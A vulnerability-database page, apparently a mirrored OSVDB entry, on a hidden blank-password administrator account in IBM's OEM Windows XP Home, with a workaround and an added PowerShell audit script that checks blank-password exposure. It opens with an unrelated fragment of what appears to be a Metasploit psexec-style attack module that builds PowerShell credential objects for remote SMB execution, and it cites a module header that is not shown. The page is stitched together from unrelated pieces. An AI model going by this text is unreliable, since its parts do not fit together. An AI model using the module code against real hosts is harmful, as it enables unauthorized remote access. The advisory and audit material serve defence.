      break if session_created? && datastore['ExitOnSession']
      break if  datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f)

      Rex.sleep(1)
    end

    print_status("Completed")
  end

  def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass'])
    creds = ""

    unless user.nil?
      creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\
      "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist "
      if domain.nil?
        creds << "'#{user}'"
      else
        creds << "'#{domain}\\#{user}'"
      end

      creds << ",$pass;"
    end

    creds
  end
end


- Vulnerability Information

10050
IBM OEM Windows XP Home Default Hidden Administrator Account
Physical Access Required Authentication Management
Loss of Integrity
Exploit Public

- Vulnerability Description

The OEM version of Windows XP Home from IBM contains a flaw that may allow a malicious user to arbitrarily manipulate a system. The problem is that the product contains a default hidden administrator account with a blank password. It is possible that the flaw may allow arbitrary system manipulation resulting in a loss of integrity.

- Timeline

2004-09-15 2004-08-06
2004-09-15 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Under control panel, go to Administrative Tools. Open Computer Management. Go to System Tools->Local Users and Groups->Users. Set a password for the administrator account.
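
The XP "Sharing and security model for local accounts" setting quoted in the psexec module header and the workaround above (set a password on the administrator account) can both be audited and applied from PowerShell. The script below is an added example, not part of this entry or of any tool it references. It assumes an elevated PowerShell 5.1+ session on a current Windows host, uses the built-in Get-LocalUser/Set-LocalUser cmdlets, and reads the LSA registry values LimitBlankPasswordUse and ForceGuest, which back the "Accounts: Limit local account use of blank passwords to console logon only" and "Network access: Sharing and security model for local accounts" policies respectively. Windows does not expose whether a password is blank, so the audit reports the observable signals (PasswordRequired and PasswordLastSet) rather than claiming to detect a blank password outright.

```powershell
# Added example, not from the OSVDB entry above. Assumes an elevated PowerShell 5.1+
# session on a current Windows host; Get-LocalUser/Set-LocalUser come from the built-in
# Microsoft.PowerShell.LocalAccounts module.

function Get-BlankPasswordExposure {
    # Windows will not reveal whether a password is blank, but two flags are observable:
    # PasswordRequired = $false (the PASSWD_NOTREQD account flag, which lets the account
    # keep an empty password) and PasswordLastSet = $null (a password has never been set).
    Get-LocalUser | Where-Object { $_.Enabled } | ForEach-Object {
        [pscustomobject]@{
            Name             = $_.Name
            IsBuiltinAdmin   = $_.SID.Value.EndsWith('-500')   # RID 500, whatever the account is named
            PasswordRequired = $_.PasswordRequired
            PasswordLastSet  = $_.PasswordLastSet
            AtRisk           = (-not $_.PasswordRequired) -or ($null -eq $_.PasswordLastSet)
        }
    }
}

function Get-NetworkLogonHardening {
    # Two LSA values decide what a blank or guessed local password is worth over the network:
    #  LimitBlankPasswordUse 1 = accounts with blank passwords may only log on at the console
    #                            ("Accounts: Limit local account use of blank passwords to console logon only")
    #  ForceGuest            1 = network logons with local accounts are mapped to Guest
    #                            (the XP "Guest only" sharing model described in the psexec module header)
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction Stop
    [pscustomobject]@{
        LimitBlankPasswordUse      = $lsa.LimitBlankPasswordUse
        BlankPasswordsConsoleOnly  = ($lsa.LimitBlankPasswordUse -eq 1)
        ForceGuest                 = $lsa.ForceGuest
        NetworkLogonsMappedToGuest = ($lsa.ForceGuest -eq 1)
    }
}

function Set-LocalAccountPassword {
    # The OSVDB workaround (set a password on the administrator account) as a cmdlet;
    # -WhatIf previews the change before anything is written.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name)
    if ($PSCmdlet.ShouldProcess($Name, 'Set a new password and require one from now on')) {
        $secure = Read-Host -AsSecureString "New password for $Name"
        Set-LocalUser -Name $Name -Password $secure
        # Set-LocalUser has no switch for PASSWD_NOTREQD; clear it with the legacy net user
        # command so the account cannot quietly go back to a blank password.
        net user $Name /passwordreq:yes | Out-Null
    }
}

Get-BlankPasswordExposure | Format-Table -AutoSize
Get-NetworkLogonHardening | Format-List
# Remediation pass, preview first:
# Get-BlankPasswordExposure | Where-Object AtRisk | ForEach-Object { Set-LocalAccountPassword -Name $_.Name -WhatIf }
```

The audit deliberately separates the account-level signal from the network-exposure signal: an account with an empty password is a local problem only while LimitBlankPasswordUse is 1, which is why the psexec module's own header notes that XP's Guest-only model blocks administrative access over SMB, and why both values belong in the same report.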

- References

- Vulnerability Author


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE/CWE/OVAL are registered trademarks of The MITRE Corporation; their official data sources are kept on MITRE's websites.